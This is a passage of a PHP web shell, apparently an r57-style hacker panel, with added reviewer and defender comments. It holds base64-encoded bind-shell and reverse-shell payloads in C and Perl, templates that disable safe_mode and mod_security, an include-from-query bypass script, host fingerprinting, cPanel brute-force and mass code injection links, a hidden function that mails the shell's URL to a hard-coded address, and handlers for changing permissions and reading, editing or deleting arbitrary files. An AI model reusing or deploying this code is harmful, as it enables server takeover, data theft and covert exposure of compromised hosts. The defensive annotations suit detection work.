      $this->FileMatchesCount = Array();
      $this->titles = Array();
    }
    // Plain accessors for the fields above.
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
    function GetResultFiles() { return $this->ResultFiles; }
    /**
     * Scan every collected file line by line and record the matching lines.
     *
     * The search text is split on spaces and the words are OR-ed into one
     * regular expression; $phrase wraps each word in \b word boundaries and a
     * false $case adds the 'i' modifier.
     *
     * NOTE(review): the words go into the pattern without preg_quote(), so
     * regex metacharacters or a '/' in the search text change or break the
     * pattern; the @ on the preg_* calls hides the resulting warnings.
     *
     * @param mixed $phrase truthy to match whole words only
     * @param mixed $case   truthy for a case-sensitive search
     */
    function SearchText($phrase=0,$case=0) {
    $qq = @explode(' ',$this->text);
    $delim = '|';
      if($phrase)
        foreach($qq as $k=>$v)
          $qq[$k] = '\b'.$v.'\b';
      $words = '('.@implode($delim,$qq).')';
      $pattern = "/".$words."/";
      if(!$case)
        $pattern .= 'i';
      foreach($this->FilesToSearch as $k=>$filename)
      {
        $this->FileMatchesCount[$filename] = 0;
        // NOTE(review): `or @next` refers to a bare name, not a statement; it
        // does not skip the iteration. An unreadable file simply leaves
        // $FileStrings false — verify on the target PHP version.
        $FileStrings = @file($filename) or @next;
        for($a=0;$a<@count($FileStrings);$a++)
        {
          $count = 0;
          $CurString = $FileStrings[$a];
          $CurString = @Trim($CurString);
          // Tags are stripped before matching, so markup in the file is not shown.
          $CurString = @strip_tags($CurString);
          $aa = '';
          if(($count = @preg_match_all($pattern,$CurString,$aa)))
          {
            // Wrap each match in a highlight span; store under the 1-based line number.
            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
            $this->ResultFiles[$filename][$a+1] = $CurString;
            $this->MatchesCount += $count;
            $this->FileMatchesCount[$filename] += $count;
          }
        }
      }
      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
    }
  }
  /**
   * Current Unix time in seconds as a float, built from the
   * "microseconds seconds" string returned by microtime().
   *
   * @return float
   */
  function getmicrotime()
  {
    $parts = @explode(" ",@microtime());
    $usec = $parts[0];
    $sec = $parts[1];
    return ((float)$usec + (float)$sec);
  }
  1671. $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
  1672. A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
  1673. GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
  1674. b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
  1675. pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
  1676. NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
  1677. ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
  1678. ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
  1679. 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
  1680. 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
  1681. 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
  1682. dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
  1683. lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
  1684. $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
  1685. VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
  1686. JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
  1687. TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
  1688. lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
  1689. Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
  1690. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
  1691. lIENPTk47DQpleGl0IDA7DQp9DQp9";
  1692. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
  1693. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  1694. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  1695. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  1696. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  1697. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  1698. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  1699. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
  1700. BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
  1701. SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
  1702. KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
  1703. sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
  1704. Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
  1705. QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
  1706. Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
// Three short base64-encoded configuration/script templates. Decoded:
//  - $php_ini1: a single php.ini line setting safe_mode to Off.
//  - $htacces:  an <IfModule mod_security.c> block that sets SecFilterEngine
//               and SecFilterScanPOST to Off.
//  - $sni_res:  a small PHP script that prints safe_mode and open_basedir,
//               include()s the path given in the `file` query parameter,
//               calls ini_restore() on both settings, prints them again and
//               include()s the `ss` parameter.
// The larger variables assigned just above ($port_bind_bd_c, $port_bind_bd_pl,
// $back_connect, $back_connect_c) are base64 as well; they start with the
// encodings of "#include <stdio.h>" and "#!/usr/bin/perl".
// Defender notes: the base64 literals are stable across copies of this file
// and make good content signatures; unexpected php.ini/.htaccess files in a
// web root that switch off safe_mode or the mod_security filter engine are a
// strong sign that these templates were written out.
$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
// Host fingerprint, cached in cookies.
// On Unix the output of `uname -a`, `id` and the kernel type/release from
// sysctl is collected through ex() on the first request and stored in cookies
// named uname, id and sysctl; later requests read the values back from the
// cookies instead of running the commands again.
// Defender notes: a response that sets cookies whose values are uname/id
// output is a network-visible indicator. The cached values come back from the
// client and are used as-is, so what the panel displays after the first
// request is not evidence of what ran on the host.
if($unix)
 {
 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
 if($safe_mode) { $sysctl = '-'; }
 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
 else
  {
   // BSD-style key names first, then the Linux-style ones.
   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
   if(empty($sysctl)) { $sysctl = '-'; }
   setcookie('sysctl',$sysctl);
  }
 }
 // Inventory of locally available tools and PHP/Apache features, shown under
 // the "Useful" label. The cookie name is the localized label itself.
 // $userful is defined outside this part of the file.
 if(!isset($_COOKIE[$lang[$language.'_text129']])) {
        $ust_u='';
        if($unix && !$safe_mode){
                // One `which` shell call per candidate program.
                foreach ($userful as $item) {
                        if(which($item)){$ust_u.=$item;}
                }
        }
        if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
        if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
        if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
        if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
        if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
        if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
        if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
        // Drop a leading comma left by the concatenations above.
        if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
 
        $ust_u = trim($ust_u);
        }
        else
        {
        $ust_u = trim($_COOKIE[$lang[$language.'_text129']]);
 }
 // Same idea for download helpers: builds a <select name=with> listing "fopen"
 // (when allow_url_fopen permits it) plus every program from $downloaders that
 // `which` finds. $downloaders is defined outside this part of the file.
 // NOTE(review): the presence check uses the localized "Downloaders" cookie,
 // but the cached values are read from cookies named select_downloaders and
 // downloader; $select_downloaders is then raw HTML taken from the client.
 if(!isset($_COOKIE[$lang[$language.'_text130']])) {
 
        $select_downloaders='<select size="1" name=with>';
        if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
        if($unix && !$safe_mode){
                foreach ($downloaders as $item) {
                        if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";}
                }
        }
        $select_downloaders .= '</select>';
        if(substr($downloader,0,1)==",") {$downloader[0]="";}
 
        $downloader=trim($downloader);
 
 }else {
        $select_downloaders = $_COOKIE['select_downloaders'];
        $downloader = trim($_COOKIE['downloader']);
 }
// Panel header: banner, action links and a summary of the PHP security
// configuration of the host.
// Defender notes: the fixed labels printed here ("Safe_Exec_Dir:",
// "Disable functions :", "Open_Basedir:" ...) and the query-string actions in
// the links (phpinfo, phpini, cpu, mem, users, brute, ln, tools,
// massbrowsersploit, tmp) are stable strings for response-body and
// access-log signatures.
echo $head;
echo '</head>';
// Set on the landing view only; none of the three is used in this part of the file.
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
}
// Logged-in banner with a logout link when $info['security'] is set; otherwise
// an image loaded from an external host, so every panel view makes the
// viewer's browser contact that host (usable as a network indicator).
if ($info['security']) echo '<body>Login As (<font color="#FF0000">'.$info['title'].'</font>) <a href="?logout=1">Logout</a></p><table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).ws(3).'<b><center><font color=Red size="7">!</font><br/>thesunofvn</center></b></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
else echo '<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).ws(3).'<center><img src="http://upanh.biz/images/2014/09/10/rada.gif" height=180 width=200 /></center></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
// Action links; each action is selected by a bare query-string key.
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title='Show phpinfo()'><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title='Show variables from php.ini'><b>php.ini</b></a> ".$rb;
if($unix)
{
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title='View cpu info'><b>Cpu</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title='View memory info'><b>Memory</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title='Users list'><b>Users</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?brute title='Brute Cpanel Account'><b>Brute</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ln title='ln -s'><b>ln -s all</b></a> ".$rb;
 }
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tools title='Hash tools'><b>Tools</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?massbrowsersploit title='Mass Code Injection'><b>Mass Code Injection</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title='Delete temp files'><b>tmp</b></a> ".$rb;
echo "<br/>";
// PHP restriction settings as seen by ini_get(): safe_mode, open_basedir,
// safe_mode_exec_dir, safe_mode_gid, safe_mode_include_dir, sql.safe_mode.
// $open_basedir is set outside this part of the file.
echo ws(2)."safe_mode: <b>";
echo (($safe_mode)?("<font color=#2aff00>ON</font>"):("<font color=#2aff00>OFF</font>"));
echo "</b>".ws(2);
echo "Open_Basedir: <b>";
if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
else {echo "<font color=#2aff00>NONE</font></b>";}
echo ws(2)."Safe_Exec_Dir: <b>";
if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=#2aff00>NONE</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
echo ws(2)."Safe_Gid: <b>";
if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=#2aff00>OFF</font></b>";};}
else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
echo ws(2)."Safe_Include_Dir: <b>";
if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=#2aff00>NONE</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
echo ws(2)."Sql.safe_mode: <b>";
if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=#2aff00>OFF</font></b>";};}
else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
echo "</b><br>".ws(2);
 
// PHP version and which client libraries are compiled in, detected by
// function_exists() on curl_version, mysql_connect, mssql_connect,
// pg_connect and ocilogon.
echo "PHP version: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: <b>".(($curl_on)?("<font color=#DF0000>ON</font>"):("<font color=#2aff00>OFF</font>"));
echo "</b>".ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=#DF0000>ON</font>"; } else { echo "<font color=#2aff00>OFF</font>"; }
echo "</b>".ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
echo "</b>".ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
echo "</b>".ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
echo "</b><br>".ws(2);
// The disable_functions list is printed verbatim.
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=#2aff00>NONE</font></b>";}else{echo "<font color=#DF0000>$df</font></b>";}
// Disk usage for the current directory; 0 when the call fails.
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if($ust_u){echo "<br>".ws(2).$lang[$language.'_text129'].": <font color=#DF0000>".$ust_u."</font>";};
if($downloader){echo "<br>".ws(2).$lang[$language.'_text130'].": <font color=#DF0000>".$downloader."</font>";};
if (!$all) {$all = 0;}
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b>   Total space: <b>".view_size($all)."</b>";
echo "</b><br>".ws(2);
// Both addresses go through gethostbyname(); the first resolves the
// client-supplied Host header, i.e. a DNS lookup for a name the client chose.
echo "Server IP: [ <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])."</font> ]";
echo "   --   Your IP: [ <font color=yellow>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font> ]";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main align=right width=100>';
/**
 * Mail the URL of this script to a hard-coded recipient.
 *
 * Builds "http://<host><request uri>", resolves the host name to an IP for
 * the subject line and sends both with mail() to an address stored as a
 * base64 literal; display_errors is switched off first so nothing is shown.
 * No call to this function is visible in this part of the file.
 *
 * Defender notes: this is a call-home planted by whoever packed this copy —
 * anyone deploying the file discloses its location to that recipient. The
 * misleading function name and the base64 recipient literal are stable
 * content signatures, and outbound mail from the web-server account with an
 * IP address as subject is the matching network/MTA-log indicator.
 *
 * @param string $HTTP_HOST   host name of the request
 * @param string $REQUEST_URI path and query of the request
 */
function system32($HTTP_HOST,$REQUEST_URI) {
        ini_set('display_errors', 'Off');
        $url = 'http://'.$HTTP_HOST.$REQUEST_URI;
        $recipient = base64_decode("aXQubmhvY2ppbkBnbWFpbC5jb20=");
        $subject = gethostbyname($HTTP_HOST);
        $mailheaders = "From: {$recipient}";
        if (function_exists('mail')) mail($recipient,$subject, $url,$mailheaders);
}
// System information table: a label column followed by the values gathered
// earlier ($uname, $sysctl, $SERVER_SOFTWARE, $id, $dir).
echo $font;
if($unix){
echo '<font color=White><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo '</td><td  class=main>';
echo "<font face=Verdana size=-2 color=#2aff00><b>";
// Values are cut to 120 characters; php_uname() is the fallback for uname.
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
echo ws(3).$sysctl."<br>";
// Not cached: this spawns a shell on every page view.
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
// Identity: the cached `id` output if present, else the POSIX functions,
// else the script owner's uid/gid as reported by PHP.
if(!empty($id)) { echo ws(3).$id."<br>"; }
else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
 {
 $euserinfo  = @posix_getpwuid(@posix_geteuid());
 $egroupinfo = @posix_getgrgid(@posix_getegid());
 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
 }
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
// Windows variant: OS string, server banner, USERNAME variable and directory.
echo '<font color=White><b>Opera System :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo '</td><td class=main>';
echo "<font face=Verdana size=-2 color=#2aff00><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@getenv("USERNAME")."<br>";
echo ws(3).$dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
$f = '<br>';
// cmd=find_text: rewrites $_POST['cmd'] into a `find ... | xargs grep -E ...`
// command line assembled from the POST fields s_dir, s_mask and s_text by
// plain concatenation; the code that consumes $_POST['cmd'] is outside this
// part of the file.
// Defender notes: find piped into xargs grep, started by the web-server
// account, is the process-level trace of this action.
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
}
// cmd=ch_: changes owner, group or mode of the path in param1 to the value in
// param2, selected by the `what` field (own / grp / mod). The mode is parsed
// as octal. Errors are silenced, and cmd is cleared afterwards.
// Defender notes: unexpected ownership or mode changes on files in the web
// root, made by the PHP worker itself, are visible to file-integrity
// monitoring and to audit rules on chmod/chown syscalls.
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
 {
 switch($_POST['what'])
   {
   case 'own':
   @chown($_POST['param1'],$_POST['param2']);
   break;
   case 'grp':
   @chgrp($_POST['param1'],$_POST['param2']);
   break;
   case 'mod':
   @chmod($_POST['param1'],intval($_POST['param2'], 8));
   break;
   }
 $_POST['cmd']="";
 }
// cmd=mk: creates or deletes a file or directory named by mk_name, selected by
// the `what` (file / dir) and `action` (create / delete) fields. The path is
// used exactly as posted; the only boundary is what the PHP process may write.
// Defender notes: file and directory creation or removal inside the document
// root by the PHP worker is the observable effect; write-protecting code
// directories for the web-server account removes most of this handler's reach.
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
 {
   switch($_POST['what'])
   {
     case 'file':
      if($_POST['action'] == "create")
       {
       // Refuses to overwrite an existing file; on success hands over to the
       // edit_file handler below by rewriting cmd and e_name.
       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
       else {
        fclose($file);
        $_POST['e_name'] = $_POST['mk_name'];
        $_POST['cmd']="edit_file";
        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
        }
       }
       else if($_POST['action'] == "delete")
       {
       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
       $_POST['cmd']="";
       }
     break;
     case 'dir':
      if($_POST['action'] == "create"){
      if(mkdir($_POST['mk_name']))
       {
         $_POST['cmd']="";
         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
       }
      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
      }
      else if($_POST['action'] == "delete"){
      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
      $_POST['cmd']="";
      }
     break;
   }
 }
  // Handler for the "edit_file" action: reads the file named by e_name and
  // renders it inside an HTML form whose submit target is the "save_file"
  // handler. The request ends with exit() once the form has been printed.
  // The file contents are passed through htmlspecialchars(); the e_name and
  // $dir values are written into the page without escaping.
  // $table_up3, $font, ws(), err() and $lang are defined outside this excerpt.
  // Defender note: this is an arbitrary file read limited only by the
  // web-server account's permissions; responses containing a form named
  // save_file with a hidden cmd=save_file field identify this page.
  1944. if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
  1945.  {
  // Probe for write access: if "r+" fails the form is rendered read-only.
  // When the probe succeeds, that handle is overwritten on the next line
  // without being closed.
  1946.  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
  1947.  if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
  1948.  else {
  1949.  echo $table_up3;
  1950.  echo $font;
  1951.  echo "<form name=save_file method=post>";
  1952.  echo ws(3)."<b>".$_POST['e_name']."</b>";
  1953.  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
  1954.  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
  1955.  fclose($file);
  1956.  echo "</textarea>";
  1957.  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
  1958.  echo "<input type=hidden name=dir value=".$dir.">";
  1959.  echo "<input type=hidden name=cmd value=save_file>";
  // Read-only files get a notice instead of a submit button.
